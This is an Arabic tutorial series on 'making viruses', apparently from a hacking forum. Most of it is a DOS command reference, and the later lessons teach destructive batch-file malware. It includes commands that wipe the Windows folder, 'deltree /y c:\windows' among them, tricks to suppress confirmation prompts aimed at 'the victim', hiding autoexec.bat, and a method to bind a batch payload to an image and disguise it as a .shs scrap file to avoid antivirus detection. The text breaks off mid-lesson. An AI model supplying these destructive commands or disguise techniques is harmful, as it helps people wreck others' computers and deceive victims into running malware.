احترف صناعه الفايروسات --->
بسم الله الرحمن الرحيم
السلم عليكم
الدرس الول:
الفيروسات (الجزء الأول)
من منا ل يعرف الفيروسات و اخطارها؟! و التدمير
الممكن تحقيقه بهذه الفيروسات!
من يصنع الفيروسات بغرض الذي, فليس ال مستهتر
غبي يستعمل العلم في اشياء مضرة, و من اخطر
الفيروسات التي صنعت حتي الن هو فيروس
شرنوبيل, الذي يقوم بتدمير الجهاز كليا, اخترعه شاب
في الحادي و العشرين من عمره ل يهوي ال التدمير..
مقدمة عن الفيروسات:
تصنع الفيروسات ببرامج مثل دلفي و باسكال ..الخ, اما
ما سنصنعه الن ليس فيروسات, بل برامج مدمرة
تقوم بنفس عمل الفيروسات, و ل يستطيع النورتن
كشفها..
أفكار هذه الفيروسات بسيطة و سهلة, و كلها بأكواد
درسناها من قبل, ولكن لتصميم فيروسك الخاص, يجب
ان يتوافر لديك الذكاء, انظر الي المثلة و اعرف طريقة
صنع هذه الفيروسات ثم اصنع افكار مثلها..
ارجو من كل اخ مسلم عدم استخدام هذه الفيرووس ضد
المسلمين
بس الدرس الول دا هيكون عن كلم كتير بس غير
الفيروسات بس حاجات تساعدنا في تصنيع الفيروسا
اول حاجة ابدا بكل اول الدوس
اوامر الدوس
دي اوامر الدوس ودي استعن بشرح الخ سوفا من
منتدي القراصنة
Disk Operating System اختصار ل (DOS) كلمة
هو مجموعة من الأوامر : DOS * تعريف ال
والتعليمات التي تتحكم في مكونات الحاسب اللي.
في جهاز الكمبيوتر: هو حلقة الوصل DOS دور
ال
بين الكمبيوتر والمستخدم.
الملفات:
هي تنظيم DOS إن أهم الخدمات التي يقدمها ال
حفظ البيانات في الملفات.
تعريف الملف: هو عبارة عن وعاء لحفظ البرامج أو
النصوص أو البيانات، وهو أصغر وحدة للحفظ بالنسبة
لنظام التشغيل.
* تسمية الملفات:
ينقسم اسم الملف إلي قسمين:
ويجب أل يزيد ( ROOT ) القسم الأول: وهو الأساس
طوله عن 8 حروف. وهذا الجزء من اسم الملف ضروري
إي
يجب وجوده.
القسم الثاني: ويسمى المتداد ويجب أل يزيد طوله
عن 3 حروف، ويجب أن يفصل بين السم ( الأساس) و
المتداد بعلمة النقطة ( . ). وهذا الجزء من السم
اختياري يمكن
الستغناء عنه.
جميع
الملفات التي تنتهي بأحد الإمدادات التالية
قابلة للتحميل والتنفيذ المباشر. BAT , EXE , COM
ونبين هنا بعض أشهر أنواع الإمدادات المستخدمة مع
أسماء ملفاتها الكاملة:
.( BATCH ) ملف أوامر تنفذ دفعة واحدة BAT.
.( COMMAND ) ملف برنامج COM.
.( EXECUTABLE ) ملف جاهز للتنفيذ EXE.
.( DOCUMENT ) ملف نصوص أو وثائق DOC.
ملف مصدر برنامج مكتوب بلغة التجميع ( ASM.
.( ASSEMBLY
.( BACKUP ) ملف احتياطي BAK.
.( BASIC ) ملف برنامج بيسك BAS.
.( DBASE FILE ) ملف قاعدة بيانات DBF.
ملف برنامج مكتوب بلغة باسكال ( PAS.
.( PASCAL
.( SYSTEM ) ملف تكوين نظام SYS.
.( C ) ملف مصدر مكتوب بلغة سي C.
الرموز المستخدمة في تسمية الملفات:
سواء كانت صغيرة ) Z إلي A 1الحروف
الأبجدية من
أو كبيرة ).
. 2الأرقام
من 0 إلي 9
3بعض
العلمات مثل: ( { } ، ( ) ، & ، % ، $ ، # ،
.( !
* الشروط التي يجب مراعاتها عند اختيار اسم الملف:
8 حروف. 1
طول
السم الأساسي للملف من 1
2يجب
أل يزيد السم الممتد إن
وجدعن
3 أحرف.
3أن
يفصل بين السم الأساسي والسم الممتد إن
وجدبعلمة
النقطة ( . ).
4أن
يكتب السم الأساسي والسم الممتد بدون
فراغات.
ALT ، ) : 5عدم
استخدام مفاتيح التحكم وهي
في أي اسم . ( CTRL ، ESC
6عدم
استخدام الأسماء المحجوزة لنظام التشغيل مثل
PRN الخاص يلوحة المفاتيح و شاشة العرض أو CON
الخاص باسم الطابعة.
7عدم
استخدام الرموز ذات الدللة الخاصة لنظام
التشغيل وهي * ، / ، ، + ، = ، ؟).
تنظيم الملفات على القرص:
للحصول على ملفات منظمة على القرص يجب إنشاء
فذلك يسهل التعامل مع الملفات ( Directory ) الدليل
وترتيبها بسهولة.
هو عبارة عن مجموعة
Directory ) تعريف
الدليل
ملفات توضع تحت مسمى دليل معين.
أقسام
الأدلة: تقسم الأدلة إلي أربعة أقسام:
بإنشائه Dos 1الدليل
الرئيسي: وهو الدليل الذي يقوم
تلقائياً عند تشكيل السطوانة وتوضع تحته جميع
الملفات المنشأة.
2الدليل
الفرعي: وهو الذي ينشأ تحت دليل رئيسي (
.( subdirectory
ونظرا لأن مستخدم الكمبيوتر يتعامل مع عدد كبير من
الملفات لذلك يفضل أن توزع هذه الملفات في أدلة
فرعية.
ويمكن
إنشاء الأدلة الفرعية داخل الدليل الرئيسي أو
داخل أدلة فرعية أخرى.
الفرق
بين الدليل الرئيسي والدليل الفرعي: هو أن
النظام ينشئ الدليل الرئيسي تلقائياً، بينما ينشئ
المستخدم الدليل الفرعي.
يوجد
دليل رئيسي واحد في كل قرص بينما قد يوجد
في القرص عدة أدلة فرعية.
3الدليل
الأبوي: وهو نوع من الأدلة تتفرع منه أدلة
فرعية عديدة فيصبح دليلً أبوياً لهم.
ومثال على ذلك:
SCHOOLCLASS
في المثال السابق يعتبر دليلً ( SCHOOL ) إن الدليل
.( CLASS ) أبوياً للدليل الفرعي
4الدليل
الحالي: وهو الدليل الذي يكون مستخدما وقت
العمل عليه ، وكذلك هو الدليل الذي يتم التعامل مع
ملفاته بدون أن يسبقها اسم دليل آخر ل
يرتبط بدليل
أبوي.
* طريقة تحميل نظام التشغيل من الأسطوانة المرنة:
هناك طريقتين لعمل ذلك :
الطريقة الأولى: ( يجب أن يكون الجهاز مغلق )
.A 1ندخل
اسطوانة الدوس في محرك الأقراص
2نقوم
بتشغيل جهاز الكمبيوتر .
الطريقة الثانية: (حين يكون الجهاز يعمل)
.A 1ندخل
اسطوانة الدوس في محرك الأقراص
ALT + : 2نقوم
بالضغط على المفاتيح التالية معا
. CTRL + DELETE
DOS ) * رموز محركات الأقراص في نظام التشغيل
ويوجد هناك Floppy Disk ) 1الأسطوانة
المرنة
نوعين من الأسطوانات المرنة وهما :
أأسطوانة
مرنة حجم 3.5 بوصة.
بأسطوانة
مرنة حجم 5.25 بوصة.
.B أو A ويرمز
لمحرك الأسطوانات المرنة بالرمز
.C ويرمز له بالرمز Hard Disk ) 2القرص
الصلب
.E أو D ويرمز له بالرمز CDROM
) 3
* طريقة التنقل بين محركات الأقراص: بالضغط
على الرمز ثم نلحقه ب :
* الملفات الساسية لنظام التشغيل ال (
DOS
يتكون نظام التشغيل من ثلثة ملفات أساسية تمثل
البنية الأساسية للنظام والعمود الفقري له وهي كالتالي:
وهذا الملف خاص بالتحكم في الإدخال : IO.SYS : أولً
والإخراج.
وهذا الملف يحتوي على : MSDOS.SYS : ثانياً
مجموعة كبيرة من الأوامر التي توضع في الذاكرة عند
التشغيل.
وهذا الملف يحتوي على : COMMAND.COM : ثالثاً
جميع أوامر نظام التشغيل الداخلية .
* مكونات نظام التشغيل:
ينقسم نظام التشغيل إلي ثلثة أجزاء رئيسية :
الجزء الأول منه يتحكم في الأجهزة والجزء الثاني عبارة
عن مجموعة من التعليمات والأوامر تعمل بصورة
تلقائية ل دخل للمستخدم فيها ول يمكنه التحكم بها
والتي ( ROM ) وهي مخزنة في ذاكرة القراءة فقط
ليمكن مسحها أو تعديلها والجزء الثالث عبارة عن
مجموعة من الأوامر و البرامج تعتبر خدمات للمستخدم
وتيسر له استخدام الكمبيوتر .
* الختصارات :
اختصارين اثنين ( DOS ) يستخدم نظام التشغيل
عوضاً عن أسماء الملفات أو جزء منها داخل صيغة
الأوامر وهما:
1) الرمز ( ? ) : ويستخدم للدللة على غياب حرف واحد
فقط من اسم أحد الملفات.
2) الرمز ( * ) : ويستخدم للدللة على غياب أي عدد
من الحروف (بشرط أن ل يتجاوز 8 أحرف).
* الأوامر:
إلى قسمين: DOS تنقسم أوامر ال
1الأوامر
الداخلية : وهي الأوامر التي يتم
أثناء تشغيل الجهاز RAM تحميلها إلى ذاكرة ال
ويتم تنفيذها من الذاكرة بمعنى أن هذا النوع من الأوامر
ل يستلزم وجود أسطوانة لتنفيذه.
من أمثلة الأوامر الداخلية:
CLS TIME
DATE
MD
CD
RD
DIR
DEL
2الأوامر
الخارجية : وهي الأوامر التي ل يتم
أثناء تشغيل الجهاز RAM تحميلها إلى ذاكرة ال
وإنما تبقى على الأسطوانة وليتم تنفيذ إي أمر منها
يشترط وجود اسطوانة نظام التشغيل داخل المشغل
المرن أو الصلب.
من أمثلة الأوامر الخارجية:
FORMAT DISKCOPY
DISKCOMP
COMP
SYS
EDIT
تنقسم
أوامر نظام التشغيل الداخلية والخارجية إلي
ستة أنواع :
1أوامر
النظام:
MEM
DATE
VER
DosKey
PROMPT
CLS
VSAFE
MEMMAKER
MODE
COMMAND
MSD
TIME
DEFRAG
2أوامر
السطوانة:
SCANDISK
CHKDSK
FORMAT
DISKCOMP
DISKCOPY
MSBACKUP
SYS
LABEL
FDISK
UNFORMAT
VOL
3أوامر
الفهرس:
APPEND
DIR
CD
RD
MOVE
DATE
DELTREE
MD
TREE
4أوامر
الملفات:
TYPE
COPY CON
COPY
ATTRIB
DEL
REN
UNDELETE
XCOPY
PRINT
FIND
EDIT
SORT
MSAV
MORE
HELP
5الأوامر
الحزمية:
REM
CALL
ECHO
FOR
IF
PAUES
SHIFT CHOICE
GOTO
6أوامر
خاصة ونادرة الستخدام:
FASTOPEN
MSCDEX
CHCP
INTERLNK
QBASIC
DRVSPACE.SYS
LOADFIX
SHARE
FASTHELP
NLSFUNC
CTTY
INSTALL.HIGH
RECOVER
DEBUG
KEYB
السلم عليكم
الدرس الول:
الفيروسات (الجزء الثاني)
* شرح لهم الوامر المستخدمة في نظام ال
: DOS
وتعني VERSION وهو اختصار كلمة ) VER : 1الأمر
إصدار ) وهو من الأوامر الداخلية ووظيفته
MSالستعلم
عن رقم إصدار نظام التشغيل ال
. DOS
:DOS في ال VER ومثال على ذلك قم بكتابة الأمر
MSDOS
سيظهر ENTER ثم بالضغط على مفتاح
. VER 6.22
ملحظة:
هذه الإجابة تختلف من جهاز إلي آخر حسب
نسخة نظام التشغيل .
التاريخ ) وهو من الأوامر الداخلية ) DATE : 2الأمر
ووظيفته عرض التاريخ الموجود بالجهاز مع إمكانية
تعديله.
في ال DATE ومثال على ذلك قم بكتابة الأمر
:DOS
current سيظهر ENTER ثم بالضغط على مفتاح
Enter New Date وكذلك Date is THU 032599
للتعديل ولإدخال التاريخ الجديد تسجل mmddyy
أولً الشهر ثم اليوم ثم السنة وإذا لم نرغب في كتابة
تاريخ جديد يكفي الضغط على مفتاح الإدخال
بدون كتابة إي شئ. ENTER
ملحظة:
هذه الإجابة طبعاً تختلف من جهاز إلي آخر
حسب التاريخ .
:DOS شروط
كتابة التاريخ في نظام التشغيل
. 1نظام
التشغيل ل يقبل إي تاريخ قبل سنة 1980
2ل
يمكن استخدام التاريخ الهجري.
3ل
يمكن كتابة الأشهر بالحروف.
4ل
يمكن استخدام النقطتين الرأسيتين : كفاصل بين
في التاريخ
mm)
5أن
تستخدم في كتابة التاريخ النظام الأمريكي
الشهر ثم اليوم ثم السنة . (ddyy
الوقت ) وهو من الأموامر الداخلية ) TIME : 3الأمر
ووظيفته عرض الوقت المسجل داخل جهاز الحاسب
مع إمكانية تعديله.
DOS في ال TIME ومثال على ذلك قم بكتابة الأمر
current سيظهر ENTER ثم بالضغط على مفتاح
Enter New Time وكذلك Time is : 4:40:55.75a
للتعديل وذلك بأن تسجل أولً الساعات ثم الدقائق ثم
الثواني ثم كسر الثواني ثم تحديد الوقت صباحاً أو
مساءاً وإن لم ترغب في كتابة وقت جديد يكفيك
بدون كتابة إي ENTER الضغط على مفتاح الإدخال
شئ .
ملحظة:
هذه الإجابة طبعاً تختلف من جهاز إلي آخر
حسب الوقت .
Clear The وهو اختصار لجملة ) CLS : 4الأمر
وتعني مسح الشاشة ) وهو من الأوامر الداخلية Screen
ووظيفته هي تنظيف الشاشة من كافة البيانات التي
عليها وإرجاع محث التشغيل إلي أول سطر على
الشاشة مهما كان موقعه أثناء تنفيذ الأمر.
: DOS في ال CLS ومثال على ذلك قم بكتابة الأمر
سيتم تنظيف الشاشة ENTER ثم بالضغط على مفتاح
من البيانات الموجودة عليها وليس مسح البيانات.
وهو من الأوامر الداخلية ووظيفته PROMPT : 5الأمر
تغيير شكل محث التشغيل لنظام التشغيل.
التالي: PROMPT ومن أهم استخدامات الأمر
إلي علمة C تغيير شكل المحث PROMPT $D
تاريخ اليوم
إلي علمة C تغيير شكل المحث PROMPT $T
الوقت الحالي
إلي علمة = C تغيير شكل المحث PROMPT $Q
إلي علمة $ C تغيير شكل المحث $$ PROMPT
إلي رقم إصدار C تغيير شكل المحث PROMPT $V
نظام التشغيل
( Volume Label وهو اختصار لكلمة ) VOL : 6الأمر
وهو من الأوامر الداخلية ووظيفته عرض اسم الأسطوانة
الداخلي
DOS في ال VOL ومثال غلى ذلك قم بكتابة الأمر
Volume in سيظهر ENTER ثم بالضغط على مفتاح
drive C is alwafa
ملحظة:
هذه الإجابة طبعاً تختلف من جهاز إلي آخر
حسب اسم القرص .
وهو من الأوامر الداخلية ووظيفته عرض DIR : 7الأمر
الملفات الموجودة على الفهرس الحالي ومن خلله
نستطيع عرض :
1اسم
السطوانة والرقم المسلسل لها.
2اسم
الفهرس الحالي والمسار الحالي له.
3عرض
الملفات الموجودة بخمس بيانات(اسم الملف
نوع
الملف (امتداده) مساحة
الملف بالبايت (حجم
الملف)تاريخ
إنشاء الملف وقت
إنشاء الملف) .
4عرض
الفهارس الموجودة بأربعة بيانات وهي (اسم
< DIR > الفهرسعلمة
الفهرس وتكون على الشكل
بجوار اسم الفهرستاريخ
إنشاء الفهرس وقت
إنشاء
الفهرس ).
5رسالة
تعرض إجمالي عدد الملفات الموجودة بالفهرس
الحالي والذي يتم عرضه وكذلك المساحة الكلية لهذه
الملفات.
6المساحة
الحرة أو الشاغرة على السطوانة أو
القرص .
بسم الله الرحمان الرحيم
الدرس الول:
الفيروسات (الجزء الثالث)
:DIR أهم صور استخدامات الأمر
لعرض الملفات صفحة صفحة DIR/P
لعرض الملفات بعرض الشاشة DIR/W
لعرض أسماء الفهارس والملفات ونوعها فقط DIR/B
لعرض أسماء الفهارس والملفات بالحروف DIR/L
الصغيرة
لعرض كل الملفات والفهارس الموجودة بالفهرس DIR/S
الحالي
لعرض الفهارس والملفات مرتبة ترتيب أبجدي DIR/O
Z إلي A من
لعرض الفهارس والملفات مرتبة حسب DIR/OS
مساحتها بالبايت من الأصغر إلي الأكبر
عرض الملفات المخفية فقط DIR/AH
عرض ملفات القراءة فقط وهي محمية من DIR/AR
الإلغاء
عرض ملفات النظام فقط DIR/AS
عرض جميع الفهارس فقط بدون الملفات DIR/AD
عرض الملفات التي تحمل علمة الأرشيف DIR/AA
فقط
( Make Directory وهو اختصار لكلمة ) MD : 8الأمر
وهو من الأوامر الداخلية ووظيفته إنشاء فهرس فرعي من
الفهرس الرئيسي أو إنشاء فهرس فرعي من فهرس
فرعي آخر.
Change وهو اختصار لكلمة ) CD : 9الأمر
وهو من الأوامر الداخلية ووظيفته: ( Directory
1معرفة
الفهرس الحالي
2النتقال
بين الفهارس إما من:
رئيسي
إلي فرعي
فرعي
إلي رئيسي
وإذا أردنا معرفة الفهرس الحالي الذي نقف عليه نكتب
ENTER فقط ثم نقوم بالضغط على مفتاح CD الأمر
Remove وهو اختصار لكلمة ) RD 10 الأمر
وهو من الأوامر الداخلية ووظيفته حذف أو ( Directory
إزالة الفهرس الفرعي ،ولحذف أو إزالة إي فهرس فرعي
فهناك شرطين:
1إزالة
جميع الملفات والبرامج الموجودة داخل الفهرس
الفرعي المراد إزالته.
2أل
يكون الفهرس الفرعي المراد إزالته هو الذي نقف
عليه الن بل يجب أن نكون على فهرس آخر أعلى
منه رتبة.
وهو من الأوامر الداخلية ووظيفته COPY : 11 الأمر
نسخ ملف أو مجموعة ملفات في نفس الفهرس أو فهرس
آخر أو في أسطوانة أخرى.
وهو من الأوامر الداخلية COPY CON : 12 الأمر
ووظيفته إنشاء وكتابة ملفات نصية جديدة من لوحة
المفاتيح وعرضها وطباعتها.
إنه: COPY CON ومن عيوب الأمر
1ل
يمكن الصعود لسطر قد تمت كتابته وتم الضغط
.ENTER على مفتاح الإدخال
2ل
يمكن فتح ملف للتعديل به بعد حفظه من نفس
الأمر بل يكون من محرر النصوص الموجود مع نظام
. EDIT وهو DOS التشغيل
COPY ملحظة:
لحفظ الملف المنشأ عن طريق الأمر
قم بعمل إحدى الخطوات التالية: CON
ثم الضغط على مفتاح ctrl+z أالضغط
على مفتاحي
الإدخال.
ثم الضغط على مفتاح F بالضغط
على مفتاح 6
الإدخال.
وهو من الأوامر الداخلية ووظيفته TYPE : 13 الأمر
عرض محتويات الملفات النصية على الشاشة.
ملحظة:
يقوم هذا الأمر بعرض الملفات النصية أما
فل يمكن EXECOMSYS
الملفات التي من النوع
عرضها .
وهو من ( Rename وهو اختصار لكلمة ) REN : 14 الأمر
الأوامر الداخلية ووظيفته تغيير اسم الملف أو نوعه أو
كلهما .
مثال( 1
وهو ( DELETE وهو اختصار لكلمة ) DEL : 15 الأمر
من الأوامر الداخلية ووظيفته مسح ملف أو مجموعة
ملفات في نفس الفهرس أو في فهرس آخر أو في
أسطوانة أخرى.
ملحظة: في حال مسح كل الملفات ل بد من ظهور
الرسالة التأكيديه التالية:
All Files in directory will be deleted
Are you Sure Y/N
وإذا Y وإذا أردت حذف جميع الملفات أضغط حرف
.N أردت إلغاء العملية اضغط
وهو من الأوامر الداخلية ووظيفته فتح PATH : 16 الأمر
مسار أو عدة مسارات على مجموعة محددة من
الفهارس على أسطوانة واحدة أو عدة أسطوانات وذلك
حتى يسهل التعامل مع الملفات الواقعة عليها من إي
في Autoexec.bat إلى ملف PATH موقع ويدرج أمر
سطر واحد (لو تكرر الأمر وبصورة مختلفة سيحفظ منه
فقط آخر صورة له في آخر سطر ) ويوصف بداخله كل
الفهارس التي نرغب بالتعامل معها مباشرة بدون
للدخول إليها. CD إستخدام الأمر
ملحظات
هامة:
في Autoexec.bat داخل ملف PATH 1يوضع
أمر
سطر واحد .
على إي مشغل أقراص PATH 2من
الممكن كتابة أمر
في كل مرة تفتح فيها حاسبك.
DOS على ال PATH مثال على ذلك قم بكتابة الأمر
لكي تعرف اسم المسار الموجود بالجهاز.
وهو من الأوامر الخارجية ووظيفته MEM : 17 الأمر
إعطاء تقارير كاملة عن حالة جميع أنواع الذاكرة.
وهو من الأوامر الخارجية ووظيفته: MODE : 18 الأمر
1التحكم
في حجم الكتابة وعرضها على الشاشة.
2إعطاء
تفاصيل عن الملحقات المتصلة بالحاسب وما
إذا كانت متصلة معه على التوالي أو على التوازي.
وهو من الأوامر الخارجية DOSKEY : 19 الأمر
ووظيفته:
1استدعاء
وتعديل اسطر الأوامر وذلك باستدعاء كل ما
سبق تنفيذه من أوامر .
وهو عبارة عن ( Macros ) 2إنشاء
ما يسمى بالماكرو
مجموعة من الأوامر تجمع تحت اسم واحد ويعطى لها
مفتاح معين لتشغليها بخطوة واحدة.
يقوم بحجز 4 كليو DOSKEY ملحظة
هامة: الأمر
بايت من الذاكرة الأساسية.
وهو من الأوامر الخارجية ووظيفته: MSD : 20 الأمر
1اكتشاف
مواصفات الحاسب من حيث:
( نوع المعالج حجم
الذاكرة أنواع
مشغلت
الأقراص مواصفات
نظام العرض وباقي
المكونات).
2الحصول
على تقارير فنية تفيد باكتشاف
المشاكل التي حدثت على الحاسب مثل تلف
. RAM شرائح الذاكرة الوهو
من الأوامر الخارجية Command : 21 الأمر
ووظيفته تفسير أوامر نظام التشغيل الداخلي.
وهو من الأوامر الخارجية ووظيفته DEFRAG : 22 الأمر
تتمثل برفع كفاءة التشغيل للقرص الصلب أو القرص
المرن حيث إنه يقوم بتجميع الملفات المبعثرة إلي
جوار بعضها وبالتالي توفير مساحة إضافية.
وهو من الأوامر الخارجية FORMAT : 23 الأمر
ووظيفته تهيئة الأسطوانة الصلبة أو المرنة.
وهو من الأوامر الخارجية ووظيفته LABEL : 24 الأمر
إعادة تسمية السطوانة أو تعديل إسمها أو مسحه.
وهو من الأوامر الخارجية DISKCOPY : 25 الأمر
ووظيفته نسخ أسطوانة مرنة على أخرى مطابقة لها
تماما من حيث النوع والحجم والسعة ويقوم بنسخ
كامل الملفات حتى المخفية.
ل يستطيعان XCOPY والأمر COPY ملحظة : (الأمر
نقل الملفات المخفية).
وهو من الأوامر الخارجية ووظيفته CHKDSK : 26 الأمر
فحص الأسطوانة وإعطاء تقرير عن حالتها.
وهو من الأوامر الخارجية UNFORMAT : 27 الأمر
ووظيفته إستعادة محتويات أسطوانة ما كانت قد
.FORMAT مسحت جميع محتوياتها من خلل الأمر
ملحظة
هامة:
إعادة محتويات UNFORMAT يستطيع الأمر
الأسطوانة التي سبق عمل تهيئة لها ولكن بشرط عدم
عند التهيئة FORMAT إستخدامها مسبقاً مع الأمر
وإل فأنه يستحيل إعادة محتويات الأسطوانة كما
كانت .
وهو من الأوامر الخارجية ووظيفته: SYS : 28 الأمر
إلي أسطوانة MSDOS
1نسخ
ملفات نظام التشغيل
ما.
إلي أسطوانة ما. COMMAND.COM 2نسخ
ملف
وهو من الأوامر الخارجية DISKCOMP : 29 الأمر
ووظيفته المقارنة بين اسطوانتين متطابقتين .
ملحظة: هذا الأمر ل ينفع التعامل به مع أقراص صلبة
على الإطلق.
وهو من الأوامر الخارجية SCANDISK : 30 الأمر
ويستخدم لكتشاف إي أجزاء تالفة على القرص .
وهو من الأوامر الخارجية ووظيفته FDISK : 31 الأمر
تهيئة وإعداد القرص الصلب للتعامل مع نظام التشغيل
.DOS
وهو من الأوامر الخارجية ووظيفته TREE : 32 الأمر
عرض أسماء الفهارس المكونة لشجرة الفهارس وكذلك
عرض مساراتها.
وهو من الأوامر الخارجية ووظيفته MOVE : 33 الأمر
نقل ملف أو أكثر أو فهرس فرعي من مكان لخر.
وهو من الأوامر الخارجية DELTREE : 34 الأمر
ووظيفته حذف فهرس فرعي بما يحتويه حتى لو كان
بداخله ملفات.
وهو من الأوامر الخارجية UNDELETE : 35 الأمر
.DEL ووظيفته استعادة الملفات الممحاة بواسطة الأمر
ملحظات هامة:
فإن نظام التشغيل DEL 1عندما
يتم حذف ملف بالأمر
يقوم بتغيير الحرف الأول من هذا الملف وتحويله DOS
إلي علمة ؟.
2يمكن
استرجاع ملف قبل تخزين إي ملف آخر جديد
على الملف السابق.
وهو من الأوامر الخارجية ووظيفته ATTRIB : 36 الأمر
يعرض ويتحكم في صفحات الملف وذلك بتغيير
خصائصه كجعله مثلً ملف خفي أو ملف نظام أو قابل
للقراءة فقط أو غير ذلك.
وهو من الأوامر الخارجية ووظيفته PRINT : 37 الأمر
طباعة الملفات النصية فقط.
وهو من الأوامر الخارجية ووظيفته XCOPY : 38 الأمر
نسخ مجموعة من الملفات أو الفهارس .
وهو من الأوامر الخارجية وهو عبارة EDIT : 39 الأمر
والذي من DOS عن محرر نصوص تابع لنظام التشغيل
خلله تتمكن من كتابة وتعديل الملفات.
ملحظات
هامة:
حيث COPY CON يعالج هذا الأمر جميع عيوب الأمر
أنه باستخدامه يمكن عمل التي:
1فتح
ملف سبق حفظه والتعديل فيه.
2التحرك
داخل الملف يميناً ويساراً ولأعلى ولأسفل .
Save ثم نختار أمر Alt+F 3يتم
حفظ الملف باستخدام
ثم كتابة أسم الملف.
ثم نختار أمر Alt+F يتم
الخروج من الأمر باستخدام
.Exit
لبد من وجود ملف EDIT لكي
يعمل الأمر
QBASIC.EXE
بسم الله الرحمن الرحيم
الدرس الثاني:
طريقة صناعة الفيروسات عن طريق الملفات الدفاعية
1تعريف
الملفات الدفاعية :
DOS هي عبارة عن حزمة من اوامر نظام التشغيل
يمكننه من خلله استخدام اكثر من امر دوسي في
وقت واحد مما يسهل للمستخدم الستخدام مثل
|format,copy,cd ..... | استخدام اكثر من امر 393
2.
طرق صناعة الملفات الدفاعية :
الطريقة الولى :
واكتب
Run واضغط على start <1
.افتح
ENTAR واضغط على command
ثم اسم الفيروس | 564 | و (copy con) 2.اكتب امر
Enter ثم اضغط bat المتداد
3.اكتب الكود
4.لحفظ طريقتان هما
Enter ومن ثم F 1.اضغط على 6
Enter و من ثم Ctrl + z 2.اضغط على
الطريقة الثانية :
1
.ابدأ >
البرامج >
البرامج الملحقة >
Notepad المفكرة
2.اكتب الكود
و حدد الموقع bat 3.احفظ الفيروس بامتداد
الطريقة الثالثة :
DOS
<1
.ابدأ >
البرامج
Edit 2.اكتب
| 3.ادخل الكود | 312
و حدد المسار الخاص به bat 4.قم بحفظ الملف بمتداد
3ايعازات
التشغيل :
اليعاز الوظيفة
تمنع عمل الإيعاز ( تعرض سطر على الشاشة ) Echo
نقل بدون السؤال نعمل
Nul
الدخول الى ملف Call
@ يمنع عرض السطر على الشاشة
يمسح الشاشة Cls
يقول للضحية الضغط على اي زر Puse
بعد هذا المر ضع اسم اي برنامج ليتم تغيله Start
عند تشغيل الفيروس
يوضع في نهاية الفيروس و هو ينهي الفيروس بعد End
تنفيذ الوامر
ايعاز ل n/
الدخول الى ملف \cd
الخروج من ملف cd\
| ايعاز نعم | 364 y/
***ارجوا ان تكون واضحة و هي سهلة الستخدام
4طريقة
تشفير الفيروس :
اخواني هذه الطريقة ليست لتشفير الفيروس فقط بل
لدمج الفيروس و تغير امتداد الفيروس اما سبب تغير
فسوف اذكر السبب في الدرس exe الى bat المتداد من
الرابع في قسم اسئلة و حلول ...
عن طريق برنامج Batch يمكنك تغير امتداد ال
في الصداران الخامس و Microsoft Visual Basic
السادس :
1.افتح برنامج الفيجول بيسك
من قائمة الدوات سوف تظهر لك OLD 2.اختر الداة
ثم Create from File اختر منها Insert Object نافذة
واختر الصورة التي تريدها أو Browse اضغط على
OK مقطع فلم أو اي شيء تريده ثم اضغط على
مره اخرى وارسم مربع ثاني واختار OLE 3.اختر اداة
واختر الباتش Browse ثم Create from File
OK الذي تريده ثم اضغط
4.ادخل كود الفروم :
:
Microsoft Visual Basic 5.0
LE1.DoVerb OLE2.DoVerb
:
Microsoft Visual Basic 6.0
OLE1.DoVerb
OLE2.DoVerb
تقوم باخفاء الفورم ' me.hide
سوف
Make Project1.exe اختر File 5.من قائمة
اكتب اسم الملف Make Project تأتيك نافذة باسم
لقد انتهينا |Virus | الذي تريد تسميته مثل اكتب 105
EXE من دمج الباتش مع الصوره ولكن امتداده
الى امتداد غير EXE 6.الن سوف نقوم بتغيير امتداد
معروف| 104 | من قبل الكثير من مستخدمي النترنت
والمتداد
وهذا المتداد جدا خطير لما فيه من امكانيات SHS هو
Scrap Object التصال مع البرامج الخرى وهو
والطريقه هي كالتالي :
افتح البرنامج WordPad 1.قم بتشغيل برنامج
وصغر النافذه وافتح مجلد الذي حفظت فيه ملف
الباتش+الصورة حاول تنسق النوافذ والن اضغط على
بالزرار اليسر مره واحده ول ترفع Virus البرنامج
WordPad اصبعك عن الزرار ثم اسحبه الى برنامج
سوف ينتقل الملف الى البرنامج بكل سهوله ثانيا
اضغط بالزر اليمن على
Package اختر WordPad 2.الملف الذي انتقل الى
سوف تظهر لك نافذه بأسم Edit Package ثم Object
اختر Object Packager Package
in Document
ثالثا واخيرا اختر Copy Package ثم Edit قائمة
ثم اضغط في المكان EditServer المجلد الذي به ملف
لصق) سوف ) Paste الفارغ على الزرار اليمن ثم اختر
| وهذا | 535 Scrap يتكون لك ملف شكله غريب باسم
واذا ضغط عليه دبل shs هوالملف قد تغير امتداده الى
كلك سوف تظهر لك صوره وسوف يشتغل ايضا ملف
الباتش الذي دمجته مع الصوره والن قد حصلت على
باتش مرفق بصوره .
يبدأ start يتصل في ملف معين اما المر Call المر
بتنفيذ امر او تشغيل برنامج
: ( مثال ( 1
:PHP كود
call attrib h
r
c:autoexec.bat >nul
للتصال Call اخوي في هذا المثال استخدمنا المر
و قمنا بتغير خصائصه autoexec في الملف
: ( مثال ( 2
:PHP كود
start MSPaint
في هذا المثال امرنا بتشغيل برنامج الرسام اول ما يبدا
الفيروس عمله
enter ويضغط y واريد المستخدم مثل يضغط حرف
يتنفذ امر اخر enter و n وينفذ امر معين و
اخي سوف اعطيك مثال عندما تقوم بالفورمات
سوف يسألك الحاسب هل انت متأكد اجب ب
هنا نكتب هذا اليعاز لتجاهل الرسالة و ال اذ لم Y,N
نكتب اليعاز سوف يظهر مثل رسالة تقول للضحية
سوف تقوم بحذف مجلد الوندوز هل انت متأكد من ذلك
... و اكيد سوف يجب ب ل و هكذا ل يعمل الفيروس...
بسم الله الرحمن الرحيم
الدرس الثالث:
صناعة الفيروسات عن طريق المفات الدفاعية
اليوم يا شباب راح انكمل دروس احتراف صناعة
Batch Files الفيروسات عن طريق المفات الدفاعية
المهم نحن بهذاك الدرس اتعلمنا بعض اليعزات و
طريق تشفير و غير ذالك ... المهم هذا الدرس راح انطي
امثلة عن العمل مع الملفات اخواني انا في هذه
الدروس اعلمكم على كيفية التعامل مع الملفات
الدفاعية لنه بعد التعلم سوف تقدر ان تصنع
فيروسات بدون مساعدة من اي شخص و تصنعون
فيروسات غير مكشوفة ان شاء الله
1اوامر
و امثلة :
del Delete
File
del c:\windows\*.txt
الشرح : لمسح ملف ما في هذا المثال قمنا بمسح كل
ما يوجد في مجلد الوندوز
deltree Delete
Folder
deltree \y c:\windows
الشرح : لمسح ملف اي ليس له امتداد ملف هنا مسحنا
ملف وندوز وليس ما بداخل الوندوز ملحوظة هامة هذا
